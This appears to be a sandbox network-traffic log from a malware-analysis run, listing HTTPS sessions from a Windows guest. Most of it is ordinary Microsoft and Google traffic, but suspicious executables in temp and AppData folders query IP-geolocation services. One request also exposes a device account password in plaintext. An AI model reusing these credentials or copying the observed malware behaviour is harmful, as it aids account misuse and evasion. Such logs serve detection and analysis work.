                                                                                                                                                                                                                                      Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[4,0,0,0,0]]],558,[["1713490161000",null,null,null,
2024-04-19 01:29:32 UTC | 925 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                      Set-Cookie: NID=513=FAR9xw05PYMKi-rL5fgDcMmA3WtllB1CX3U0TQp-ac0aw4OdCXywDmx5f1jGU049Rg-Gx1ncQvL1aX2EByz9BGVRy2z67UdcNvUHQpiFDtfc7hlZfv0TYd6c8WUGzwsVwIaRfByZ-4s0Gl-WscaQ2HFH7yRIDo4q9mTYo3kysTQ; expires=Sat, 19-Oct-2024 01:29:32 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
2024-04-19 01:29:32 UTC | 137 | IN
                                                                                                                                                                                                                                      Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-04-19 01:29:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49801 | 40.126.29.15 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:39 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 3592
                                                                                                                                                                                                                                      Host: login.live.com
2024-04-19 01:29:39 UTC | 3592 | OUT
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-19 01:29:39 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:39 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 38a12655-86eb-49d3-94d4-d6d5b1d241fc
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002FA3F V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:39 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1276
2024-04-19 01:29:39 UTC | 1276 | IN
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49806 | 40.126.29.15 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:40 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 3528
                                                                                                                                                                                                                                      Host: login.live.com
2024-04-19 01:29:40 UTC | 3528 | OUT
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-19 01:29:40 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:40 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 4ed3a962-3ed0-46a4-b886-fb8c26a97ee0
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F0D1 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:40 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1276
2024-04-19 01:29:40 UTC | 1276 | IN
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49807 | 40.126.29.15 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:40 UTC | 446 | OUT | POST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 7642
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:40 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 6b 65 6e 6f 64 62 6d 72 6b 72 6f 6c 64 6b 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 4c 5a 3f 71 28 78 25 31 2a 49 4a 55 4c 53 21 67 66 6a 49 4a 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 76 6e 71 75 73 6b 66 70 70 70 63 69 76 63 3c 2f 4f 6c 64 4d
                                                                                                                                                                                                                                      Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02kenodbmrkroldk</Membername><Password>LZ?q(x%1*IJULS!gfjIJ</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:40 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C542_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 74302422-c7e0-4e8d-931b-34770226fa1b
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F0FE V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:47 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 17166
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 43 30 30 44 41 38 44 39 35 32 31 32 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 31 62 61 64 31 61 36 37 2d 65 65 62 37 2d 34 35 61 61 2d 62 66 32 31 2d 30 32 64 30 35 36 39 33 64 62 34 33 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                                                                                                      Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018C00DA8D95212</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="1bad1a67-eeb7-45aa-bf21-02d05693db43" LicenseID="3252b20c-d425-4711
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                                                                                                                      Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49811 | 34.117.186.192 | 443 | 7988 | C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:41 UTC | 237 | OUT | GET /widget/demo/81.181.57.52 HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ipinfo.io
2024-04-19 01:29:42 UTC | 513 | IN | HTTP/1.1 200 OK
server: nginx/1.24.0
date: Fri, 19 Apr 2024 01:29:41 GMT
content-type: application/json; charset=utf-8
Content-Length: 980
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
x-envoy-upstream-service-time: 2
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-19 01:29:42 UTC | 742 | IN | Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
2024-04-19 01:29:42 UTC | 238 | IN | Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49813 | 104.26.5.15 | 443 | 7988 | C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:42 UTC | 261 | OUT | GET /demo/home.php?s=81.181.57.52 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: db-ip.com
2024-04-19 01:29:42 UTC | 658 | IN | HTTP/1.1 200 OK
Date: Fri, 19 Apr 2024 01:29:42 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
x-iplb-request-id: 6CA2ED8C:B06E_93878F2E:0050_6621C906_8C8571C:4F34
x-iplb-instance: 59215
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3IvpEAc3hK%2BBEjeUo%2B4GTEWqbbfO93DP8ixRzxERmVfwJgVVI9tRBlQLuZ1tg6Nby%2BcT4ZIBetnXnmfFzpobnNAGL614KEbaF%2FGXP%2Fhx16ZLAfvnSt2gHol4dA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87692008adf7135b-ATL
alt-svc: h3=":443"; ma=86400
2024-04-19 01:29:42 UTC | 85 | IN | Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-04-19 01:29:42 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49825 | 34.117.186.192 | 443 | 1864 | C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:48 UTC | 237 | OUT | GET /widget/demo/81.181.57.52 HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ipinfo.io
2024-04-19 01:29:48 UTC | 513 | IN | HTTP/1.1 200 OK
server: nginx/1.24.0
date: Fri, 19 Apr 2024 01:29:48 GMT
content-type: application/json; charset=utf-8
Content-Length: 980
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
x-envoy-upstream-service-time: 2
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-19 01:29:48 UTC | 742 | IN |
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC238INData Raw: 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49826 | 40.126.29.15 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:48 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
Connection: Keep-Alive
Content-Type: application/soap+xml
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
Content-Length: 3592
Host: login.live.com
2024-04-19 01:29:48 UTC | 3592 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-19 01:29:49 UTC | 569 | IN | HTTP/1.1 200 OK
Cache-Control: no-store, no-cache
Pragma: no-cache
Content-Type: application/soap+xml; charset=utf-8
Expires: Fri, 19 Apr 2024 01:28:48 GMT
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Referrer-Policy: strict-origin-when-cross-origin
x-ms-route-info: C517_SN1
x-ms-request-id: 533d04a6-543a-4652-a90f-c8903adfbea0
PPServer: PPV: 30 H: SN1PEPF0002F9F1 V: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-XSS-Protection: 1; mode=block
Date: Fri, 19 Apr 2024 01:29:49 GMT
Connection: close
Content-Length: 11390
2024-04-19 01:29:49 UTC | 11390 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49827 | 104.26.5.15 | 443 | 1864 | C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:48 UTC | 261 | OUT | GET /demo/home.php?s=81.181.57.52 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: db-ip.com
2024-04-19 01:29:49 UTC | 652 | IN | HTTP/1.1 200 OK
Date: Fri, 19 Apr 2024 01:29:49 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
x-iplb-request-id: AC471635:E800_93878F2E:0050_6621C90D_8C5D114:7B63
x-iplb-instance: 59128
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BkUIunqf9NRWbcTBeGjKfM0IB7oJTWRMohHTNST9dqNgXqpBSJxL34495Te6dnf3TnrE%2FcBltYbZFfNkE6aiCCzGk0maQ4IM4rbbHhXGH8uLKFXPKdfYsH%2FvIA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 876920323f0306f6-ATL
alt-svc: h3=":443"; ma=86400
2024-04-19 01:29:49 UTC | 85 | IN | Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-04-19 01:29:49 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49830 | 40.126.29.15 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:50 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
Connection: Keep-Alive
Content-Type: application/soap+xml
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
Content-Length: 3592
Host: login.live.com
2024-04-19 01:29:50 UTC | 3592 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-19 01:29:50 UTC | 569 | IN | HTTP/1.1 200 OK
Cache-Control: no-store, no-cache
Pragma: no-cache
Content-Type: application/soap+xml; charset=utf-8
Expires: Fri, 19 Apr 2024 01:28:50 GMT
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Referrer-Policy: strict-origin-when-cross-origin
x-ms-route-info: C517_SN1
x-ms-request-id: b3aadc89-1595-48c0-8562-7dba311b703e
PPServer: PPV: 30 H: SN1PEPF0002F9D0 V: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-XSS-Protection: 1; mode=block
Date: Fri, 19 Apr 2024 01:29:50 GMT
Connection: close
Content-Length: 11390
2024-04-19 01:29:50 UTC | 11390 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      22 | 192.168.2.5 | 49833 | 40.126.29.15 | 443 | |
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC | 4775 | OUT
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:51 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: a71ab345-e3ba-4a69-88e5-80799c9833fb
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F16C V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:50 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1918
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC | 1918 | IN
